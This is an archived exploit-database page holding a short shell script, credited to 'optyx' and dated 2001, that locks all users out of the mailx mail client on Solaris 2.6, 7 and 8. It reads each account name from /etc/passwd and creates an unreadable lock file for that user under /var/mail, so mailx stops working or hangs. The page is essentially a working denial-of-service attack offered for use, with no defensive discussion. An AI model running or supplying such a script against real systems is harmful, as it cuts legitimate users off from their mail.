Solaris 2.6 / 7 / 8 Lock Users Out of mailx Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Solaris 2.6 / 7 / 8 Lock Users Out of mailx Exploit
# Published : 2001-01-03
# Author : optyx
# Previous Title : ml2 - local users can crash processes
# Next Title : ProFTPD 1.2.0(rc2) (memory leakage example) Exploit

#!/bin/sh
#
# Solaris mailx(1) username.lock  proof of theory
# makes mailx not work for all users except those
# that  can erase the lockfile even so mailx will
# hang for a long time.
#
# Tested on Solaris 2.6, 7, 8
#
# by Optyx <optyx@uberhax0r.net>
# http://www.uberhax0r.net

echo "mailx-lock by optyx. http://www.uberhax0r.net"
for x in `cat /etc/passwd | cut -d':' -f1`;do
touch /var/mail/$x.lock
chmod 0 /var/mail/$x.lock
done


# www.Syue.com [2001-01-03]